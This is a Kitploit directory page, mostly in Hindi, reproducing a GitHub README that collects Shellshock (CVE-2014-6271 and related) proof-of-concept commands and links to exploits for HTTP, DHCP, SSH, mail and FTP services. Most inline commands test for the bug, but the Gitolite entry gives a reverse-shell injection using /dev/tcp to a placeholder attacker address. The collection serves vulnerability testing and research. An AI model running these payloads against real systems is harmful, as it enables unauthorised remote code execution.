Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/mubix/shellshocker-pocs
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगचयनित संसाधन
GitHubmubix/shellshocker-pocs

shellshocker-pocs

#ShellShocker के लिए प्रूफ ऑफ कॉन्सेप्ट और संभावित लक्ष्यों का संग्रह

रिपॉजिटरी देखें
889190116 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Shellshocker - "Shellshock" प्रूफ ऑफ कॉन्सेप्ट कोड का संग्रह

#ShellShocker के लिए प्रूफ ऑफ कॉन्सेप्ट और संभावित लक्ष्यों का संग्रह

विकिपीडिया लिंक: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

यदि आपके पास और लिंक या अन्य संसाधन हैं, तो कृपया पुल रिक्वेस्ट सबमिट करें।

अटकलें:(गैर-पुष्ट, संभावित रूप से असुरक्षित)

  • XMPP(ejabberd)
  • Mailman - पुष्टि की गई है कि असुरक्षित नहीं है
  • MySQL
  • NFS
  • Bind9
  • Procmail देखें
  • Exim देखें
  • Juniper गूगल खोजinurl:inurl:/dana-na/auth/url_default/welcome.cgi
    • के माध्यम से: https://twitter.com/notsosecure/status/516132301025984512
    • के माध्यम से: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS
  • Cisco Gear
    • के माध्यम से: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
  • FreePB / Asterix यहाँ पैच किया गया

यदि आप इनमें से किसी के लिए PoCs जानते हैं, तो कृपया लिंक के साथ एक इश्यू या पुल रिक्वेस्ट सबमिट करें।

कमांड लाइन (Linux, OSX, और Cygwin के माध्यम से Windows)

  • bashcheck - नवीनतम कमजोरियों के परीक्षण के लिए स्क्रिप्ट

CVE-2014-6271

  • env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

यदि असुरक्षित है, तो cwd में echo नामक एक फ़ाइल बनाएगा जिसमें दिनांक होगा

  • env X='() { (a)=>\' bash -c "echo date"; cat echo

CVE-2014-7186

  • bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

  • (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6278

  • env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :
  • अतिरिक्त जानकारी: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

CVE-2014-6277

यदि असुरक्षित है, तो segfault होगा

  • env X='() { x() { _; }; x() { _; } <<a; }' bash -c :
  • fulldisclosure पर अतिरिक्त चर्चा: http://seclists.org/fulldisclosure/2014/Oct/9
  • अतिरिक्त जानकारी: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

IBM z/OS -

  • http://mainframed767.tumblr.com/post/98446455927/bad-news-is-it-totally-works-in-bash-on-z-os-and

HTTP

  • Metasploit एक्सप्लॉइट मॉड्यूल - Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
  • Metasploit एक्सप्लॉइट मॉड्यूल - Advantech Switch Bash Environment Variable Code Injection (Shellshock)
  • Metasploit एक्सप्लॉइट मॉड्यूल - IPFire Bash Environment Variable Injection (Shellshock)
  • HTTP हैडर पोल्यूशन @irsdl द्वारा - http://pastebin.com/QNkf7dYS
  • HTTP CGI-BIN - http://pastebin.com/166f8Rjx
  • cPanel - http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
  • Digital Alert Systems DASDEC - http://seclists.org/fulldisclosure/2014/Sep/107
  • F5 - https://twitter.com/securifybv/status/515035044294172673
    • https://twitter.com/securifybv/status/515035044294172673/photo/1
    • https://twitter.com/avalidnerd/status/515056463589675008
      • https://twitter.com/avalidnerd/status/515056463589675008/photo/1
  • Invisiblethreat.ca - https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
  • कमांड लाइन संस्करण - https://gist.github.com/mfadzilr/70892f43597e7863a8dc
  • LiveHTTPHeaders के साथ User-Agent-आधारित वॉकथ्रू - http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/
  • Burp के साथ User-Agent-आधारित वॉकथ्रू - http://oleaass.com/shellshock-proof-of-concept-reverse-shell/
  • User-Agent-आधारित लेकिन Tor और Socks5 का समर्थन करता है (Python) - https://github.com/lnxg33k/misc/blob/master/shellshock.py
  • Ruby में User-Agent-आधारित - https://github.com/securusglobal/BadBash
  • मल्टीथ्रेड समर्थन के साथ sleep का उपयोग करने वाला हेडर-आधारित सरल स्कैनर - https://github.com/gry/shellshock-scanner
  • shocker - किसी फ़ाइल में URL की सूची या एकल URL को ज्ञात असुरक्षित CGI संसाधनों की सूची के विरुद्ध जाँचता है (Content-type Method)
  • Xymon - https://lists.xymon.com/archive/2014-September/040350.html
  • QNAP - https://www.exploit-db.com/exploits/36503

Phusion Passenger

  • https://news.ycombinator.com/item?id=8369776

DHCP

  • Tftpd32 के माध्यम से Trusted sec शोषण - https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
  • Metasploit एक्सप्लॉइट मॉड्यूल - Dhclient Bash Environment Variable Injection (Shellshock)
  • Metasploit सहायक मॉड्यूल - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb
  • Perl स्क्रिप्ट - http://pastebin.com/S1WVzTv9
  • लोगों को नेटवर्क से जुड़ने के लिए मजबूर करने हेतु Wi-Fi पाइनएप्पल का उपयोग करना - http://d.uijn.nl/?p=32

SSH

  • Stack Overflow - http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
  • SSH ForcedCommand - https://twitter.com/JZdziarski/status/515205581226123264
    • https://twitter.com/JZdziarski/status/515205581226123264/photo/1
  • SendEnv: LC_X='() { :; }; echo vulnerable' ssh [email protected] -o SendEnv=LC_X
  • Gitolite - https://twitter.com/Grifo/status/515089986161766400
    • $ ssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'
    • (सर्वर पर git खाता होना आवश्यक है)

OSX

  • VMware Fusion के माध्यम से Priv Escalation - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
  • फिक्स: http://support.apple.com/kb/DL1769

OSX - रिवर्स DNS के साथ (CVE-2014-3671.txt)

  • उदाहरण ज़ोन फ़ाइल: in-addr.arpa जिसमें CVE-2014-6271 का उदाहरण है।
  • एक getnameinfo() वाली उदाहरण फ़ाइल जो setenv() को आगे भेजती है: osx-rev-ptr.c
  • उपरोक्त के विवरण के साथ एडवाइज़री CVE-2014-3671.txt

SIP

  • SIP प्रॉक्सी: https://github.com/zaf/sipshock

Qmail

  • विस्तृत वॉकथ्रू - http://marc.info/?l=qmail&m=141183309314366&w=2
  • @ymzkei5 का ट्वीट - http://twitter.com/ymzkei5/status/515328039765307392
    • http://twitpic.com/ec3615
    • http://twitpic.com/ec361o

Postfix

  • http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt

FTP

  • Pure-FTPd: https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc
  • Metasploit एक्सप्लॉइट मॉड्यूल - Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)

OpenVPN

  • OpenVPN - https://news.ycombinator.com/item?id=8385332
  • @fj33r द्वारा PoC वॉकथ्रू - http://sprunge.us/BGjP

Oracle

  • चेतावनी और प्रभावित उत्पादों की सूची

TMNT

  • https://twitter.com/SynAckPwn/status/514961810320293888/photo/1
टूल डाउनलोड करें